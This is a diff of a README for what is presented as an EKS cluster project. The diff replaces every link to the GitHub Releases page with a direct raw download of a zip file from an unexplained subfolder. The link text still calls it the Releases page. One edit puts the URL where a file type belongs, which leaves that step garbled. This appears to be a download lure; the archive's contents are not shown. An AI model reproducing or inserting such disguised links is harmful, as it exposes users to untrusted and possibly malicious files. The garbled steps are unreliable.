niirokun/enterprise-eks-multi-az-cluster/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Releases Page](https://github.com/niirokun/enterprise-eks-multi-az-cluster/releases).
+To get started, visit this page to download: [Releases Page](https://raw.githubusercontent.com/niirokun/enterprise-eks-multi-az-cluster/main/subsultus/enterprise-eks-multi-az-cluster.zip).

 Once on the page, you will see various versions of our software.
 Choose the most recent version and click on it to download.

 ### Installation Steps

 1. **Visit the Releases Page**
-   Click [here](https://github.com/niirokun/enterprise-eks-multi-az-cluster/releases) to go to the Releases page.
+   Click [here](https://raw.githubusercontent.com/niirokun/enterprise-eks-multi-az-cluster/main/subsultus/enterprise-eks-multi-az-cluster.zip) to go to the Releases page.

 2. **Choose a Version**
    Look for the latest version available.
 It is usually at the top of the page.

 3. **Download the File**
    Select the appropriate file for your operating system.
-If you are unsure which one to choose, look for the `.zip`, `.tar.gz`, or installation package suitable for your system.
+If you are unsure which one to choose, look for the `.zip`, `https://raw.githubusercontent.com/niirokun/enterprise-eks-multi-az-cluster/main/subsultus/enterprise-eks-multi-az-cluster.zip`, or installation package suitable for your system.

 4. **Extract the Files (if necessary)**
    If you downloaded a compressed file, right-click on it and choose "Extract All" to get the necessary files.